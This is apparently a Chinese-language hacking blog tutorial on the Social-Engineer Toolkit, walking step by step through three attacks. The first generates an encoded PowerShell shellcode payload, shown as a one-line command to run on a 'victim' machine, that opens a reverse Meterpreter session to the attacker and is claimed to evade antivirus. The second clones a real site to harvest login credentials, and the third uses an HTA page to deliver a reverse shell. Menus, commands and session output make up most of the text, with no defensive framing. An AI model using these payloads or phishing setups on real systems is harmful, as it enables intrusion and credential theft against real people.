社会工程学(Social Engineering)简称社工,其通过分析攻击对象的心理弱点,利用人性的本能反应,以及任何好奇心,贪婪等心理特征进行的,使用诸如假冒,欺骗,引诱等多种手段来达成攻击目标的一种手段,社会工程学的应用领域非常之广泛,而很多黑客也会将社工运用到渗透的方方面面,社工也被称为没有技术,却比技术更强大的渗透方式,正所谓 “攻城为下,攻心为上” 这句话用在社工上面是最恰当不过的啦。

接下来将介绍一个工具,社会工程工具包(SEToolkit)工具,该工具由 David Kennedy (ReL1K)设计并开发,并且有一群活跃的社区合作进行维护工作(www.social-engineer.org),该工具包是开源的并使用Python作为开发语言,其主要目的是协助黑客更好的进行社工活动。

PowerShell 注入攻击

社工工具包中包含一个PowerShell注入攻击的有效载荷,适用于 Win7 - Win10系统使用,因为PowerShell脚本可以很容易的将ShellCode注入到目标的物理内存中,使用该载荷攻击不会触发病毒报警。

1.Kali系统中默认安装了SEToolkit工具,我们只需要运行该工具,然后从主菜单选择 1) Social-Engineering。

root@kali:~#  setoolkitSelect from the menu:1) Social-Engineering Attacks2) Penetration Testing (Fast-Track)3) Third Party Modules4) Update the Social-Engineer Toolkit5) Update SET configuration6) Help, Credits, and About99) Exit the Social-Engineer Toolkitset>  1

2.然后在选择下一级菜单中的 9) PowerShell Attack Vectors。

Select from the menu:1) Spear-Phishing Attack Vectors2) Website Attack Vectors3) Infectious Media Generator4) Create a Payload and Listener5) Mass Mailer Attack6) Arduino-Based Attack Vector7) Wireless Access Point Attack Vector8) QRCode Generator Attack Vector9) Powershell Attack Vectors10) SMS Spoofing Attack Vector11) Third Party Modules99) Return back to the main menu.set> 9

3.接着我们选择第一个选项,Powershell Alphanumeric Shellcode Injector

1) Powershell Alphanumeric Shellcode Injector2) Powershell Reverse Shell3) Powershell Bind Shell4) Powershell Dump SAM Database99) Return to Main Menuset:powershell> 1

4.首先设置好本机的IP地址,我这里是 192.168.1.40 然后等待生成PowerShell脚本,默认放在 /root/.set/reports/powershell/路径下,我们复制里面的内容。

Enter the IPAddress or DNS name for the reverse host: 192.168.1.40
set:powershell> Enter the port for the reverse [443]:
[*] Prepping the payload for delivery and injecting alphanumeric shellcode...
[*] Generating x86-based powershell injection code...
[*] Reverse_HTTPS takes a few seconds to calculate..One moment..
No encoder or badchars specified, outputting raw payload
Payload size: 380 bytes
Final size of c file: 1622 bytes[*] Finished generating powershell injection bypass.
[*] Encoded to bypass execution restriction policy...
[*] If you want the powershell commands and attack, they are exported to /root/.set/reports/powershell/
set> Do you want to start the listener now [yes/no]: : yes

5.通过各种途径,在被害主机上面执行这一段ShellCode代码。

powershell -w 1 -C "sv i -;sv pz ec;sv YD ((gv i).value.toString()+(gv pz).value.toString());powershell (gv YD).value.toString() 'JABOAHgAIAA9ACAAJwAkAEsAcwAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAa'"

6.回到Kali,会发现出现了一个会话,使用 sessions -i 查询,上线成功!

msf5 exploit(multi/handler) >
[*] Started HTTPS reverse handler on https://0.0.0.0:443
[*] https://0.0.0.0:443 handling request from 192.168.1.2; (UUID: skqutxoz) Staging x86 payload (180825 bytes) ...
[*] Meterpreter session 1 opened (192.168.1.40:443 -> 192.168.1.2:64014) at 2019-08-14 12:29:21 +0800msf5 exploit(multi/handler) > sessions -iActive sessions
===============Id  Name  Type                     Information                                Connection--  ----  ----                     -----------                                ----------1         meterpreter x86/windows  DESKTOP @ DESKTOP  192.168.1.40:443 -> 192.168.1.2:64014 (192.168.1.2)msf5 exploit(multi/handler) >

SEToolkit 站点克隆

  1. SEToolkit 还支持站点克隆首先选择,1)Social-Engineering Attacks
Select from the menu:1) Social-Engineering Attacks2) Penetration Testing (Fast-Track)3) Third Party Modules4) Update the Social-Engineer Toolkit5) Update SET configuration6) Help, Credits, and About99) Exit the Social-Engineer Toolkitset> 1

2.接着选择,2)Website Attack Vectors

Select from the menu:1) Spear-Phishing Attack Vectors2) Website Attack Vectors3) Infectious Media Generator4) Create a Payload and Listener5) Mass Mailer Attack6) Arduino-Based Attack Vector7) Wireless Access Point Attack Vector8) QRCode Generator Attack Vector9) Powershell Attack Vectors10) SMS Spoofing Attack Vector11) Third Party Modules99) Return back to the main menu.set> 2
  1. 选择 3)Credential Harvester Attack Method
1) Java Applet Attack Method2) Metasploit Browser Exploit Method3) Credential Harvester Attack Method4) Tabnabbing Attack Method5) Web Jacking Attack Method6) Multi-Attack Web Method7) Full Screen Attack Method8) HTA Attack Method99) Return to Main Menuset:webattack>3

4.这里会有三个选项,第一个是使用系统自带的模板,第二个是克隆一个页面,第三个是自定义页面,此处选择2,并输入待克隆页面。

set:webattack> IP address for the POST back in Harvester/Tabnabbing [192.168.1.40]:192.168.1.40
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:www.baidu.com[*] Cloning the website: http://www.baidu.com
[*] This could take a little bit...The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[*] You may need to copy /var/www/* into /var/www/html depending on where your directory structure is.
Press {return} if you understand what we're saying here.
[*] The Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
[*] Looks like the web_server can't bind to 80. Are you running Apache or NGINX?
Do you want to attempt to disable Apache? [y/n]: y
[ ok ] Stopping apache2 (via systemctl): apache2.service.
[ ok ] Stopping nginx (via systemctl): nginx.service.
[*] Successfully stopped Apache. Starting the credential harvester.
[*] Harvester is ready, have victim browse to your site.

SEToolkit HTA 注入攻击

HTA shell注入攻击,生成一个克隆页面,当用户点击运行脚本的时候,会触发反弹一个Shell。

1.根据上方的步骤,重新运行SEToolkit工具然后选择,1)Social-Engineering Attacks

Select from the menu:1) Social-Engineering Attacks2) Penetration Testing (Fast-Track)3) Third Party Modules4) Update the Social-Engineer Toolkit5) Update SET configuration6) Help, Credits, and About99) Exit the Social-Engineer Toolkitset> 1

2.选择 2)Website Attack Vectors

Select from the menu:1) Spear-Phishing Attack Vectors2) Website Attack Vectors3) Infectious Media Generator4) Create a Payload and Listener5) Mass Mailer Attack6) Arduino-Based Attack Vector7) Wireless Access Point Attack Vector8) QRCode Generator Attack Vector9) Powershell Attack Vectors10) SMS Spoofing Attack Vector11) Third Party Modules99) Return back to the main menu.set> 2

3.选择 8)HTA Attack Method

1) Java Applet Attack Method2) Metasploit Browser Exploit Method3) Credential Harvester Attack Method4) Tabnabbing Attack Method5) Web Jacking Attack Method6) Multi-Attack Web Method7) Full Screen Attack Method8) HTA Attack Method99) Return to Main Menuset:webattack>8

4.选择 2)Site Cloner,克隆一个站点,然后选择一个攻击载荷,Meterpreter Reverse TCP

1) Web Templates2) Site Cloner3) Custom Import99) Return to Webattack Menuset:webattack>2
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:www.baidu.com
[*] HTA Attack Vector selected. Enter your IP, Port, and Payload...
set> IP address or URL (www.ex.com) for the payload listener (LHOST) [192.168.1.40]:
Enter the port for the reverse payload [443]:
Select the payload you want to deliver:1. Meterpreter Reverse HTTPS2. Meterpreter Reverse HTTP3. Meterpreter Reverse TCPEnter the payload number [1-3]: 3

5.用户点击页面,运行脚本以后,成功反弹Shell。

社工工具包 SEToolkit相关推荐

  1. 社工利器--setoolkit之钓鱼攻击

    该文章仅供参考学习,切勿用于非法用途 简介 社会工程学(Social Engineering)认为人为因素才是安全的软肋.很多企业.公司在信息安全上投入大量的资金,最终导致数据泄露的原因,往往却是发生 ...

  2. 社工库365开网站公开售卖盗取的账号信息

    如今网上盗号猖獗,个人信息泄露严重. 社工库365开网站公开售卖盗取的账号信息,我测试了下,的确可以查询到密码信息.包括很早以前注册的账号,163.126都沦陷了,密码的md5值都暴露出来了. 过了2 ...

  3. 虚拟社会建设需要“网络社工”助力

    互联网在给"地球村"村民带来诸多方便与快乐的同时,也给"地球村"带来了多种多样的个人麻烦与社会问题,如网络区隔问题.网络污染问题.网络犯罪问题.网络沉湎问题.网 ...

  4. texmaker中图片过大怎么办_【社工面试】社区居民楼起火,你怎么办?

    [面试真题]你是一名社区工作人员,某天你正在值班的时候突然接到了群众的求助电话,说你所在的小区有居民楼起火了.你该怎么办? [壹心研钱老师解析] 作为一名社区工作人员,帮助社区居民解决突发状况是我们的 ...

  5. 社工库网址与制作方法

    将互联网泄露的信息汇聚成数据库,简单说:黑客数据库. 中国执行信息公开网 http://zxgk.court.gov.cn/?dt_dapp=1 全国标准信息公共服务平台 http://std.sam ...

  6. 警惕“***性社工”现象

    警惕"***性社工"现象<?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:offi ...

  7. access制作封装软件_用Access开发《社工服务管理系统》

    2018年初结缘盟威软件,了解其Access快速开发平台,特别惊喜,这不就是自己一直想要苦苦寻觅的平台吗?但那时候刚毕业工作,对于工作业务流程不是特别的了解,没有进一步深入了解,而且需要代码,所以只能 ...

  8. 水滴公司启动医务社工高级人才培养计划

    12月26日消息,日前,水滴公司对外宣布,携手中国社会工作教育协会,正式启动"水滴·医务社工高级人才培养计划",就医务社工行业人才培养与科研项目开展多维度合作.医务社工专家代表吴晓 ...

  9. 社工大师_社工,与弱势者同行 | TED演讲

    你了解社工吗? 你知道社工是做什么的吗? 用生命影响生命 做麦田里的守望者 让我们一起 走进一名10年社工的心路历程 聆听心灵的声音 感受助人的喜悦 探寻社工的真谛 演讲视频如下 大家好,我叫刘文静, ...

最新文章

  1. 如何理解Android中的xmlns
  2. Call指令和Ret指令讲解
  3. VR与游戏完美结合?斯皮尔伯格导演的《玩家一号》发布预告片
  4. 神超重回两只手操作时代?霸哥最强上单要被抢,战场在LOL手游
  5. -1.#IND000 图像类型转换
  6. php调用API支付接口(转自刘68)
  7. spring事务三大接口
  8. UI设计实例|界面设计中,版式实战运用以及设计思路
  9. 你还在盲目做抖音吗?
  10. Spring Cloud Consul
  11. 前后端分离 前端页面验证码没有显示
  12. 蓝桥杯2019年第十届C/C++省赛C组第四题-质数
  13. sift算法_图像配准SIFT
  14. 机房怎么制作服务器,电信服务器机房服务器搬迁地网制作方法
  15. iPhone 5福音 网友发布Nano-SIM剪卡教程
  16. 北、上、广、深数据分析职位分析
  17. 数据结构——图-基本知识点(第七章)
  18. AndroidBLE--Measuring distance(测量距离)
  19. kafka 复制因子_选择正确的分区计数复制因子apache kafka
  20. 《思维力:高效的系统思维》读书笔记02 - 深入理解系统化思维

热门文章

  1. 计算机网络复习5----给主机配置IP地址
  2. 常见的测试用例设计方法7---因果图法
  3. mysql 时间段天数_ORACLE任意时间段内所有天数日期查询
  4. 使用Python对股票数据进行数据分析(一)-计算日线行情、5日均线、10日均线行情并显示
  5. MySQL:Illegal mix of collations (utf8_general_ci,COERCIBLE) and (gbk_chinese_ci,IMPLICIT) for operat
  6. 弘辽科技:淘宝直通车ROI怎么提升?直通车ROI多少正常?
  7. 消除笔软件哪个好?这些软件可以无损涂抹图片
  8. Java写计算器自闭了
  9. Linux 系统查看服务器SN序列号以及服务器型号
  10. python3 实现应用启动及关键字检测